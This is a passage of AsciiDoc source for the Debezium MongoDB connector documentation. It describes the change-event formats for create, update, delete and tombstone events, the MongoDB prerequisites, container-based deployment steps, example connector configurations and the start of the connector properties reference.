},\n \"op\": \"c\", \/\/ <8>\n \"ts_ms\": 1558965515240 \/\/ <9>\n }\n }\n----\n\n.Descriptions of _create_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The value's schema, which describes the structure of the value's payload. A change event's value schema is the same in every change event that the connector generates for a particular collection.\n\n|2\n|`name`\na|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. +\n +\n`io.debezium.data.Json` is the schema for the payload's `after`, `patch`, and `filter` fields. This schema is specific to the `customers` collection. A _create_ event is the only kind of event that contains an `after` field. An _update_ event contains a `filter` field and a `patch` field. A _delete_ event contains a `filter` field, but not an `after` field nor a `patch` field.\n\n|3\n|`name`\na|`io.debezium.connector.mongo.Source` is the schema for the payload's `source` field. This schema is specific to the MongoDB connector. The connector uses it for all events that it generates.\n\n|4\n|`name`\na|`dbserver1.inventory.customers.Envelope` is the schema for the overall structure of the payload, where `dbserver1` is the connector name, `inventory` is the database, and `customers` is the collection. This schema is specific to the collection.\n\n|5\n|`payload`\n|The value's actual data. This is the information that the change event is providing. +\n +\nIt may appear that the JSON representations of the events are much larger than the documents they describe. This is because the JSON representation must include the schema and the payload portions of the message.\nHowever, by using the xref:{link-avro-serialization}#avro-serialization[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.\n\n|6\n|`after`\n|An optional field that specifies the state of the document after the event occurred. In this example, the `after` field contains the values of the new document's `\\_id`, `first_name`, `last_name`, and `email` fields. The `after` value is always a string. By convention, it contains a JSON representation of the document. MongoDB's oplog entries contain the full state of a document only for _create_ events and also for `update` events, when the `capture.mode` option is set to `change_streams_update_full`; in other words, a _create_ event is the only kind of event that contains an _after_ field, when the `capture.mode` option is set either to `oplog` or `change_streams`.\n\n|7\n|`source`\na|Mandatory field that describes the source metadata for the event. This field contains information that you can use to compare this event with other events, with regard to the origin of the events, the order in which the events occurred, and whether events were part of the same transaction. The source metadata includes:\n\n* {prodname} version.\n* Name of the connector that generated the event.\n* Logical name of the MongoDB replica set, which forms a namespace for generated events and is used in Kafka topic names to which the connector writes.\n* Names of the collection and database that contain the new document.\n* If the event was part of a snapshot.\n* Timestamp for when the change was made in the database and ordinal of the event within the timestamp.\n* Unique identifier of the MongoDB operation, which depends on the version of MongoDB. It is either the `h` field in the oplog event, or a field named `stxnid`, which represents the `lsid` and `txnNumber` fields from the oplog event (oplog capture mode only).\n* Unique identifiers of the MongoDB session `lsid` and transaction number `txnNumber` in case the change was executed inside a transaction (change streams capture mode only).\n\n|8\n|`op`\na|Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `c` indicates that the operation created a document. Valid values are:\n\n* `c` = create\n* `u` = update\n* `d` = delete\n* `r` = read (applies to only snapshots)\n\n|9\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n[id=\"mongodb-update-events\"]\n=== _update_ events\n\n==== Oplog capture mode (legacy)\nThe value of a change event for an update in the sample `customers` collection has the same schema as a _create_ event for that collection. Likewise, the event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. An _update_ event does not have an `after` value. Instead, it has these two fields:\n\n* `patch` is a string field that contains the JSON representation of the idempotent update operation\n\n* `filter` is a string field that contains the JSON representation of the selection criteria for the update. The `filter` string can include multiple shard key fields for sharded collections.\n\nHere is an example of a change event value in an event that the connector generates for an update in the `customers` collection:\n\n[source,json,indent=0,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"op\": \"u\", \/\/ <1>\n \"ts_ms\": 1465491461815, \/\/ <2>\n \"patch\": \"{\\\"$set\\\":{\\\"first_name\\\":\\\"Anne Marie\\\"}}\", \/\/ <3>\n \"filter\": \"{\\\"_id\\\" : {\\\"$numberLong\\\" : \\\"1004\\\"}}\", \/\/ <4>\n \"source\": { \/\/ <5>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mongodb\",\n \"name\": \"fulfillment\",\n \"ts_ms\": 1558965508000,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"rs\": \"rs0\",\n \"collection\": \"customers\",\n \"ord\": 6,\n \"h\": 1546547425148721999\n }\n }\n }\n----\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`op`\na|Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `u` indicates that the operation updated a document.\n\n|2\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|3\n|`patch`\n|Contains the JSON string representation of the actual MongoDB idempotent change to the document. In this example, the update changed the `first_name` field to a new value. +\n +\nAn _update_ event value does not contain an `after` field.\n\n|4\n|`filter`\n|Contains the JSON string representation of the MongoDB selection criteria that was used to identify the document to be updated.\n\n|5\n|`source`\na|Mandatory field that describes the source metadata for the event. This field contains the same information as a _create_ event for the same collection, but the values are different since this event is from a different position in the oplog. The source metadata includes:\n\n* {prodname} version.\n* Name of the connector that generated the event.\n* Logical name of the MongoDB replica set, which forms a namespace for generated events and is used in Kafka topic names to which the connector writes.\n* Names of the collection and database that contain the updated document.\n* If the event was part of a snapshot.\n* Timestamp for when the change was made in the database and ordinal of the event within the timestamp.\n* Unique identifier of the MongoDB operation, which depends on the version of MongoDB. It is either the `h` field in the oplog event, or a field named `stxnid`, which represents the `lsid` and `txnNumber` fields from the oplog event.\n\n|===\n\n[WARNING]\n====\nIn a {prodname} change event, MongoDB provides the content of the `patch` field. The format of this field depends on the version of the MongoDB database. Consequently, be prepared for potential changes to the format when you upgrade to a newer MongoDB database version. Examples in this document were obtained from MongoDB 3.4, In your application, event formats might be different.\n====\n\n[NOTE]\n====\nIn MongoDB's oplog, _update_ events do not contain the _before_ or _after_ states of the changed document. Consequently, it is not possible for a {prodname} connector to provide this information. However, a {prodname} connector provides a document's starting state in _create_ and _read_ events. Downstream consumers of the stream can reconstruct document state by keeping the latest state for each document and comparing the state in a new event with the saved state. {prodname} connector's are not able to keep this state.\n====\n\n==== Change streams capture mode\nThe value of a change event for an update in the sample `customers` collection has the same schema as a _create_ event for that collection. Likewise, the event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. An _update_ event does have an `after` value only if the `capture.mode` option is set to `change_streams_update_full`. There is a new structured field `updateDescription` with a few additional fields in this case:\n\n* `updatedFields` is a string field that contains the JSON representation of the updated document fields with their values\n\n* `removedFields` is a list of field names that were removed from the document\n\n* `truncatedArrays` is a list of arrays in the document that were truncated\n\nHere is an example of a change event value in an event that the connector generates for an update in the `customers` collection:\n\n[source,json,indent=0,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"op\": \"u\", \/\/ <1>\n \"ts_ms\": 1465491461815, \/\/ <2>\n \"after\":\"{\\\"_id\\\": {\\\"$numberLong\\\": \\\"1004\\\"},\\\"first_name\\\": \\\"Anne Marie\\\",\\\"last_name\\\": \\\"Kretchmar\\\",\\\"email\\\": \\\"annek@noanswer.org\\\"}\", \/\/ <3>\n \"updateDescription\": {\n \"removedFields\": null,\n \"updatedFields\": \"{\\\"first_name\\\": \\\"Anne Marie\\\"}\", \/\/ <4>\n \"truncatedArrays\": null\n },\n \"source\": { \/\/ <5>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mongodb\",\n \"name\": \"fulfillment\",\n \"ts_ms\": 1558965508000,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"rs\": \"rs0\",\n \"collection\": \"customers\",\n \"ord\": 1,\n \"h\": null,\n \"tord\": null,\n \"stxnid\": null,\n \"lsid\":\"{\\\"id\\\": {\\\"$binary\\\": \\\"FA7YEzXgQXSX9OxmzllH2w==\\\",\\\"$type\\\": \\\"04\\\"},\\\"uid\\\": {\\\"$binary\\\": \\\"47DEQpj8HBSa+\/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=\\\",\\\"$type\\\": \\\"00\\\"}}\",\n \"txnNumber\":1\n }\n }\n }\n----\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`op`\na|Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `u` indicates that the operation updated a document.\n\n|2\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|3\n|`after`\n|Contains the JSON string representation of the actual MongoDB document.\n +\nAn _update_ event value does not contain an `after` field if the capture mode is not set to `change_streams_update_full`\n\n|4\n|`updatedFields`\n|Contains the JSON string representation of the updated field values of the document. In this example, the update changed the `first_name` field to a new value.\n\n|5\n|`source`\na|Mandatory field that describes the source metadata for the event. This field contains the same information as a _create_ event for the same collection, but the values are different since this event is from a different position in the oplog. The source metadata includes:\n\n* {prodname} version.\n* Name of the connector that generated the event.\n* Logical name of the MongoDB replica set, which forms a namespace for generated events and is used in Kafka topic names to which the connector writes.\n* Names of the collection and database that contain the updated document.\n* If the event was part of a snapshot.\n* Timestamp for when the change was made in the database and ordinal of the event within the timestamp.\n* Unique identifiers of the MongoDB session `lsid` and transaction number `txnNumber` in case the change was executed inside a transaction.\n\n|===\n\n[WARNING]\n====\nThe `after` value in the event should be handled as the at-point-of-time value of the document.\nThe value is not calculated dynamically but is obtained from the collection.\nIt is thus possible if multiple updates are closely following one after the other, that all _update_ updates events will contain the same `after` value which will be representing the last value stored in the document.\n\nIf your application depends on gradual change evolution then you should rely on `updateDescription` only.\n====\n\n[id=\"mongodb-delete-events\"]\n=== _delete_ events\n\nThe value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same collection. The `payload` portion in a _delete_ event contains values that are different from _create_ and _update_ events for the same collection. In particular, a _delete_ event contains neither an `after` value nor a `patch` or `updateDescription` values. Here is an example of a _delete_ event for a document in the `customers` collection:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"op\": \"d\", \/\/ <1>\n \"ts_ms\": 1465495462115, \/\/ <2>\n \"filter\": \"{\\\"_id\\\" : {\\\"$numberLong\\\" : \\\"1004\\\"}}\", \/\/ <3>\n \"source\": { \/\/ <4>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mongodb\",\n \"name\": \"fulfillment\",\n \"ts_ms\": 1558965508000,\n \"snapshot\": true,\n \"db\": \"inventory\",\n \"rs\": \"rs0\",\n \"collection\": \"customers\",\n \"ord\": 6,\n \"h\": 1546547425148721999\n }\n }\n }\n----\n\n.Descriptions of _delete_ event value fields\n[cols=\"1,2,7\",options=\"header\",subs=\"+attributes\"]\n|===\n|Item |Field name |Description\n\n|1\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this document was deleted.\n\n|2\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|3\n|`filter`\n|Contains the JSON string representation of the MongoDB selection criteria that was used to identify the document to be deleted (oplog capture mode only).\n\n|4\n|`source`\na|Mandatory field that describes the source metadata for the event. This field contains the same information as a _create_ or _update_ event for the same collection, but the values are different since this event is from a different position in the oplog. The source metadata includes:\n\n* {prodname} version.\n* Name of the connector that generated the event.\n* Logical name of the MongoDB replica set, which forms a namespace for generated events and is used in Kafka topic names to which the connector writes.\n* Names of the collection and database that contained the deleted document.\n* If the event was part of a snapshot.\n* Timestamp for when the change was made in the database and ordinal of the event within the timestamp.\n* Unique identifier of the MongoDB operation, which depends on the version of MongoDB. It is either the `h` field in the oplog event, or a field named `stxnid`, which represents the `lsid` and `txnNumber` fields from the oplog event (oplog capture mode only).\n* Unique identifiers of the MongoDB session `lsid` and transaction number `txnNumber` in case the change was executed inside a transaction (change streams capture mode only).\n\n|===\n\nMongoDB connector events are designed to work with link:{link-kafka-docs}\/#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.\n\n[id=\"mongodb-tombstone-events\"]\n=== Tombstone events\nAll MongoDB connector events for a uniquely identified document have exactly the same key. When a document is deleted, the _delete_ event value still works with log compaction because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that key, the message value must be `null`. To make this possible, after {prodname}\u2019s MongoDB connector emits a _delete_ event, the connector emits a special tombstone event that has the same key but a `null` value. A tombstone event informs Kafka that all messages with that same key can be removed.\n\n\n\/\/ Type: assembly\n\/\/ ModuleID: setting-up-mongodb-to-work-with-debezium\n\/\/ Title: Setting up MongoDB to work with a {prodname} connector\n[[setting-up-mongodb]]\n== Setting up MongoDB\n\nThe MongoDB connector uses MongoDB's oplog\/change streams to capture the changes, so the connector works only with MongoDB replica sets or with sharded clusters where each shard is a separate replica set.\nSee the MongoDB documentation for setting up a https:\/\/docs.mongodb.com\/manual\/replication\/[replica set] or https:\/\/docs.mongodb.com\/manual\/sharding\/[sharded cluster].\nAlso, be sure to understand how to enable https:\/\/docs.mongodb.com\/manual\/tutorial\/deploy-replica-set-with-keyfile-access-control\/#deploy-repl-set-with-auth[access control and authentication] with replica sets.\n\nYou must also have a MongoDB user that has the appropriate roles to read the `admin` database where the oplog can be read. Additionally, the user must also be able to read the `config` database in the configuration server of a sharded cluster and must have `listDatabases` privilege action.\nWhen change streams are used (the default) the user also must have cluster-wide privilege actions `find` and `changeStream`.\n\nifdef::community[]\n[[mongodb-in-the-cloud]]\n=== MongoDB in the Cloud\n\nYou can use the {prodname} connector for MongoDB with https:\/\/www.mongodb.com\/atlas\/database[MongoDB Atlas].\nWhen connecting {prodname} to MongoDB Atlas, enable one of the xref:mongodb-property-capture-mode[`capture modes`] to be based on change streams, rather than oplog.\nNote that MongoDB Atlas only supports secure connections via SSL, i.e. the xref:mongodb-property-mongodb-ssl-enabled[`+mongodb.ssl.enabled`] connector option _must_ be set to `true`.\nendif::community[]\n\n\/\/ Type: assembly\n\/\/ ModuleID: deployment-of-debezium-mongodb-connectors\n\/\/ Title: Deployment of {prodname} MongoDB connectors\n[[mongodb-deploying-a-connector]]\n== Deployment\n\nifdef::community[]\nTo deploy a {prodname} MongoDB connector, you install the {prodname} MongoDB connector archive, configure the connector, and start the connector by adding its configuration to Kafka Connect.\n\n.Prerequisites\n* link:https:\/\/zookeeper.apache.org\/[Apache Zookeeper], link:http:\/\/kafka.apache.org\/[Apache Kafka], and link:{link-kafka-docs}.html#connect[Kafka Connect] are installed.\n* MongoDB is installed and is xref:{link-mongodb-connector}#setting-up-mongodb[set up to work with the {prodname} connector].\n\n.Procedure\n. Download the\nifeval::['{page-version}' == 'master']\n{link-mongodb-plugin-snapshot}[connector's plug-in archive],\nendif::[]\nifeval::['{page-version}' != 'master']\nhttps:\/\/repo1.maven.org\/maven2\/io\/debezium\/debezium-connector-mongodb\/{debezium-version}\/debezium-connector-mongodb-{debezium-version}-plugin.tar.gz[connector's plug-in archive],\nendif::[]\n. Extract the JAR files into your Kafka Connect environment.\n. Add the directory with the JAR files to {link-kafka-docs}\/#connectconfigs[Kafka Connect's `plugin.path`].\n. Restart your Kafka Connect process to pick up the new JAR files.\n\nIf you are working with immutable containers, see link:https:\/\/hub.docker.com\/r\/debezium\/[{prodname}'s Container images] for Apache Zookeeper, Apache Kafka, and Kafka Connect with the MongoDB connector already installed and ready to run.\n\nYou can also xref:operations\/openshift.adoc[run {prodname} on Kubernetes and OpenShift].\n\nThe {prodname} xref:tutorial.adoc[tutorial] walks you through using these images, and this is a great way to learn about {prodname}.\nendif::community[]\n\nifdef::product[]\nYou can use either of the following methods to deploy a {prodname} MongoDB connector:\n\n* xref:openshift-streams-mongodb-connector-deployment[Use {StreamsName} to automatically create an image that includes the connector plug-in].\n+\nThis is the preferred method.\n* xref:deploying-debezium-mongodb-connectors[Build a custom Kafka Connect container image from a Dockerfile].\n\n.Additional resources\n\n* xref:mongodb-connector-properties[]\n\n\/\/ Type: concept\n[id=\"openshift-streams-mongodb-connector-deployment\"]\n=== MongoDB connector deployment using {StreamsName}\n\ninclude::{partialsdir}\/modules\/all-connectors\/con-connector-streams-deployment.adoc[leveloffset=+1]\n\n\/\/ Type: procedure\n[id=\"using-streams-to-deploy-debezium-mongodb-connectors\"]\n=== Using {StreamsName} to deploy a {prodname} MongoDB connector\n\ninclude::{partialsdir}\/modules\/all-connectors\/proc-using-streams-to-deploy-a-debezium-connector.adoc[leveloffset=+1]\n\n\/\/ Type: procedure\n[id=\"deploying-debezium-mongodb-connectors\"]\n=== Deploying a {prodname} MongoDB connector by building a custom Kafka Connect container image from a Dockerfile\n\nTo deploy a {prodname} MongoDB connector, you must build a custom Kafka Connect container image that contains the {prodname} connector archive and then push this container image to a container registry.\nYou then create two custom resources (CRs):\n\n* A `KafkaConnect` CR that defines your Kafka Connect instance.\n The `image` property in the CR specifies the name of the container image that you create to run your {prodname} connector.\n You apply this CR to the OpenShift instance where link:https:\/\/access.redhat.com\/products\/red-hat-amq#streams[Red Hat {StreamsName}] is deployed.\n {StreamsName} offers operators and images that bring Apache Kafka to OpenShift.\n\n* A `KafkaConnector` CR that defines your {prodname} MongoDB connector.\n Apply this CR to the same OpenShift instance where you apply the `KafkaConnect` CR.\n\n.Prerequisites\n\n* MongoDB is running and you completed the steps to {LinkDebeziumUserGuide}#setting-up-mongodb[set up MongoDB to work with a {prodname} connector].\n\n* {StreamsName} is deployed on OpenShift and is running Apache Kafka and Kafka Connect.\n For more information, see link:{LinkDeployStreamsOpenShift}[{NameDeployStreamsOpenShift}].\n\n* Podman or Docker is installed.\n\n* You have an account and permissions to create and manage containers in the container registry (such as `quay.io` or `docker.io`) to which you plan to add the container that will run your Debezium connector.\n\n.Procedure\n\n. Create the {prodname} MongoDB container for Kafka Connect:\n\n.. Create a Dockerfile that uses `{DockerKafkaConnect}` as the base image.\nFor example, from a terminal window, enter the following command:\n+\n[source,shell,subs=\"+attributes,+quotes\"]\n----\ncat <<EOF >debezium-container-for-mongodb.yaml \/\/ <1>\nFROM {DockerKafkaConnect}\nUSER root:root\nRUN mkdir -p \/opt\/kafka\/plugins\/debezium \/\/ <2>\nRUN curl -O {red-hat-maven-repository}debezium\/debezium-connector-{connector-file}\/{debezium-version}-redhat-__<build_number>__\/debezium-connector-{connector-file}-{debezium-version}-redhat-__<build_number>__-plugin.zip\nUSER 1001\nEOF\n----\n<1> You can specify any file name that you want.\n<2> Specifies the path to your Kafka Connect plug-ins directory. If your Kafka Connect plug-ins directory is in a different location, replace this path with the actual path of your directory.\n+\nThe command creates a Dockerfile with the name `debezium-container-for-mongodb.yaml` in the current directory.\n\n.. Build the container image from the `debezium-container-for-mongodb.yaml` Docker file that you created in the previous step.\nFrom the directory that contains the file, open a terminal window and enter one of the following commands:\n+\n[source,shell,options=\"nowrap\"]\n----\npodman build -t debezium-container-for-mongodb:latest .\n----\n+\n[source,shell,options=\"nowrap\"]\n----\ndocker build -t debezium-container-for-mongodb:latest .\n----\nThe preceding commands build a container image with the name `debezium-container-for-mongodb`.\n\n.. Push your custom image to a container registry, such as `quay.io` or an internal container registry.\nThe container registry must be available to the OpenShift instance where you want to deploy the image.\nEnter one of the following commands:\n+\n[source,shell,subs=\"+quotes\"]\n----\npodman push _<myregistry.io>_\/debezium-container-for-mongodb:latest\n----\n+\n[source,shell,subs=\"+quotes\"]\n----\ndocker push _<myregistry.io>_\/debezium-container-for-mongodb:latest\n----\n\n.. Create a new {prodname} MongoDB `KafkaConnect` custom resource (CR).\nFor example, create a `KafkaConnect` CR with the name `dbz-connect.yaml` that specifies `annotations` and `image` properties as shown in the following example:\n+\n[source,yaml,subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectApiVersion}\nkind: KafkaConnect\nmetadata:\n name: my-connect-cluster\n annotations:\n strimzi.io\/use-connector-resources: \"true\" \/\/ <1>\nspec:\n #...\n image: debezium-container-for-mongodb \/\/ <2>\n----\n<1> `metadata.annotations` indicates to the Cluster Operator that `KafkaConnector` resources are used to configure connectors in this Kafka Connect cluster.\n<2> `spec.image` specifies the name of the image that you created to run your Debezium connector.\nThis property overrides the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable in the Cluster Operator.\n\n.. Apply the `KafkaConnect` CR to the OpenShift Kafka Connect environment by entering the following command:\n+\n[source,shell,options=\"nowrap\"]\n----\noc create -f dbz-connect.yaml\n----\n+\nThe command adds a Kafka Connect instance that specifies the name of the image that you created to run your {prodname} connector.\n\n. Create a `KafkaConnector` custom resource that configures your {prodname} MongoDB connector instance.\n+\nYou configure a {prodname} MongoDB connector in a `.yaml` file that specifies the configuration properties for the connector.\nThe connector configuration might instruct {prodname} to produce change events for a subset of MongoDB replica sets or sharded clusters.\nOptionally, you can set properties that filter out collections that are not needed.\n+\nThe following example configures a {prodname} connector that connects to a MongoDB replica set `rs0` at port `27017` on `192.168.99.100`,\nand captures changes that occur in the `inventory` collection.\n`fullfillment` is the logical name of the replica set.\n+\n.MongoDB `inventory-connector.yaml`\n[source,yaml,options=\"nowrap\",subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectApiVersion}\n kind: KafkaConnector\n metadata:\n name: inventory-connector \/\/ <1>\n labels: strimzi.io\/cluster: my-connect-cluster\n spec:\n class: io.debezium.connector.mongodb.MongoDbConnector \/\/ <2>\n config:\n mongodb.hosts: rs0\/192.168.99.100:27017 \/\/ <3>\n mongodb.name: fulfillment \/\/ <4>\n collection.include.list: inventory[.]* \/\/ <5>\n----\n<1> The name that is used to register the connector with Kafka Connect.\n<2> The name of the MongoDB connector class.\n<3> The host addresses to use to connect to the MongoDB replica set.\n<4> The _logical name_ of the MongoDB replica set, which forms a namespace for generated events and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the Avro converter is used.\n<5> An optional list of regular expressions that match the collection namespaces (for example, <dbName>.<collectionName>) of all collections to be monitored.\n\n. Create your connector instance with Kafka Connect.\nFor example, if you saved your `KafkaConnector` resource in the `inventory-connector.yaml` file, you would run the following command:\n+\n[source,shell,options=\"nowrap\"]\n----\noc apply -f inventory-connector.yaml\n----\n+\nThe preceding command registers `inventory-connector` and the connector starts to run against the `inventory` collection as defined in the `KafkaConnector` CR.\nendif::product[]\n\nifdef::community[]\n[[mongodb-example-configuration]]\n=== MongoDB connector configuration example\n\nFollowing is an example of the configuration for a connector instance that captures data from a MongoDB replica set `rs0` at port 27017 on 192.168.99.100, which we logically name `fullfillment`.\nTypically, you configure the {prodname} MongoDB connector in a JSON file by setting the configuration properties that are available for the connector.\n\nYou can choose to produce events for a particular MongoDB replica set or sharded cluster.\nOptionally, you can filter out collections that are not needed.\n\n[source,json]\n----\n{\n \"name\": \"inventory-connector\", \/\/ <1>\n \"config\": {\n \"connector.class\": \"io.debezium.connector.mongodb.MongoDbConnector\", \/\/ <2>\n \"mongodb.hosts\": \"rs0\/192.168.99.100:27017\", \/\/ <3>\n \"mongodb.name\": \"fullfillment\", \/\/ <4>\n \"collection.include.list\": \"inventory[.]*\" \/\/ <5>\n }\n}\n----\n<1> The name of our connector when we register it with a Kafka Connect service.\n<2> The name of the MongoDB connector class.\n<3> The host addresses to use to connect to the MongoDB replica set.\n<4> The _logical name_ of the MongoDB replica set, which forms a namespace for generated events and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the Avro converter is used.\n<5> A list of regular expressions that match the collection namespaces (for example, <dbName>.<collectionName>) of all collections to be monitored. This is optional.\n\nendif::community[]\n\nFor the complete list of the configuration properties that you can set for the {prodname} MongoDB connector,\nsee xref:{link-mongodb-connector}#mongodb-connector-properties[MongoDB connector configuration properties].\n\nifdef::community[]\nYou can send this configuration with a `POST` command to a running Kafka Connect service.\nThe service records the configuration and starts one connector task that performs the following actions:\n\n* Connects to the MongoDB replica set or sharded cluster.\n* Assigns tasks for each replica set.\n* Performs a snapshot, if necessary.\n* Reads the oplog\/change stream.\n* Streams change event records to Kafka topics.\n\n[[mongodb-adding-connector-configuration]]\n=== Adding connector configuration\n\nTo start running a {prodname} MongoDB connector, create a connector configuration, and add the configuration to your Kafka Connect cluster.\n\n.Prerequisites\n\n* xref:{link-mongodb-connector}#setting-up-mongodb[MongoDB is set up to work with a {prodname} connector].\n* The {prodname} MongoDB connector is installed.\n\n.Procedure\n\n. Create a configuration for the MongoDB connector.\n\n. Use the link:{link-kafka-docs}\/#connect_rest[Kafka Connect REST API] to add that connector configuration to your Kafka Connect cluster.\nendif::community[]\n\n.Results\nAfter the connector starts, it completes the following actions:\n\n* xref:{link-mongodb-connector}#mongodb-performing-a-snapshot[Performs a consistent snapshot] of the collections in your MongoDB replica sets.\n* Reads the oplogs\/change streams for the replica sets.\n* Produces change events for every inserted, updated, and deleted document.\n* Streams change event records to Kafka topics.\n\nifdef::product[]\n\/\/ Type: procedure\n[id=\"verifying-that-the-debezium-mongodb-connector-is-running\"]\n=== Verifying that the {prodname} MongoDB connector is running\n\ninclude::{partialsdir}\/modules\/all-connectors\/proc-verifying-the-connector-deployment.adoc[leveloffset=+1]\nendif::product[]\n\n\/\/ Type: reference\n\/\/ Title: Description of {prodname} MongoDB connector configuration properties\n[[mongodb-connector-properties]]\n=== Connector properties\n\nThe {prodname} MongoDB connector has numerous configuration properties that you can use to achieve the right connector behavior for your application.\nMany properties have default values. Information about the properties is organized as follows:\n\n* xref:debezium-mongodb-connector-required-configuration-properties[Required {prodname} MongoDB connector configuration properties]\n* xref:debezium-mongodb-connector-advanced-configuration-properties[Advanced {prodname} MongoDB connector configuration properties]\n\nThe following configuration properties are _required_ unless a default value is available.\n\n[id=\"debezium-mongodb-connector-required-configuration-properties\"]\n.Required {prodname} MongoDB connector configuration properties\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property |Default |Description\n\n|[[mongodb-property-name]]<<mongodb-property-name, `+name+`>>\n|\n|Unique name for the connector. Attempting to register again with the same name will fail. (This property is required by all Kafka Connect connectors.)\n\n|[[mongodb-property-connector-class]]<<mongodb-property-connector-class, `+connector.class+`>>\n|\n|The name of the Java class for the connector. Always use a value of `io.debezium.connector.mongodb.MongoDbConnector` for the MongoDB connector.\n\n|[[mongodb-property-mongodb-hosts]]<<mongodb-property-mongodb-hosts, `+mongodb.hosts+`>>\n|\n|The comma-separated list of hostname and port pairs (in the form 'host' or 'host:port') of the MongoDB servers in the replica set. The list can contain a single hostname and port pair. If `mongodb.members.auto.discover` is set to `false`, then the host and port pair should be prefixed with the replica set name (e.g., `rs0\/localhost:27017`). +\n +\n[NOTE]\n====\nIt is mandatory to provide the current primary address.\nThis limitation will be removed in the next {prodname} release.\n====\n\n|[[mongodb-property-mongodb-connection-string]]<<mongodb-property-mongodb-connection-string, `+mongodb.connection.string+`>>\n|\n|Mongodb connection string used for initial replica set discovery. This option requires `mongodb.members.auto.discover` to be set to `true` and it mustn't be used together with `mognodb.hosts` +\n +\n[NOTE]\n====\nAt the moment the connection string is used only for the initial replica set discovery. Other\nconfiguration properties are still used when connecting directly to primary rs members -- with the exception of credential which (when present) is extracted from given connection string.\n====\n\n|[[mongodb-property-mongodb-name]]<<mongodb-property-mongodb-name, `+mongodb.name+`>>\n|\n|A unique name that identifies the connector and\/or MongoDB replica set or sharded cluster that this connector monitors.\nEach server should be monitored by at most one {prodname} connector, since this server name prefixes all persisted Kafka topics emanating from the MongoDB replica set or cluster.\nUse only alphanumeric characters, hyphens, dots and underscores to form the name.\nThe logical name should be unique across all other connectors, because the name is used as the prefix in naming the Kafka topics that receive records from this connector. +\n +\n[WARNING]\n====\nDo not change the value of this property.\nIf you change the name value, after a restart, instead of continuing to emit events to the original topics, the connector emits subsequent events to topics whose names are based on the new value.\n====\n\n|[[mongodb-property-mongodb-user]]<<mongodb-property-mongodb-user, `+mongodb.user+`>>\n|\n|Name of the database user to be used when connecting to MongoDB. This is required only when MongoDB is configured to use authentication.\n\n|[[mongodb-property-mongodb-password]]<<mongodb-property-mongodb-password, `+mongodb.password+`>>\n|\n|Password to be used when connecting to MongoDB. This is required only when MongoDB is configured to use authentication.\n\n|[[mongodb-property-mongodb-authsource]]<<mongodb-property-mongodb-authsource, `+mongodb.authsource+`>>\n|`admin`\n|Database (authentication source) containing MongoDB credentials. This is required only when MongoDB is configured to use authentication with another authentication database than `admin`.\n\n|[[mongodb-property-mongodb-ssl-enabled]]<<mongodb-property-mongodb-ssl-enabled, `+mongodb.ssl.enabled+`>>\n|`false`\n|Connector will use SSL to connect to MongoDB instances.\n\n|[[mongodb-property-mongodb-ssl-invalid-hostname-allowed]]<<mongodb-property-mongodb-ssl-invalid-hostname-allowed, `+mongodb.ssl.invalid.hostname.allowed+`>>\n|`false`\n|When SSL is enabled this setting controls whether strict hostname checking is disabled during connection phase. If `true` the connection will not prevent man-in-the-middle attacks.\n\n|[[mongodb-property-database-include-list]]<<mongodb-property-database-include-list, `+database.include.list+`>>\n|_empty string_\n|An optional comma-separated list of regular expressions that match database names to be monitored; any database name not included in `database.include.list` is excluded from 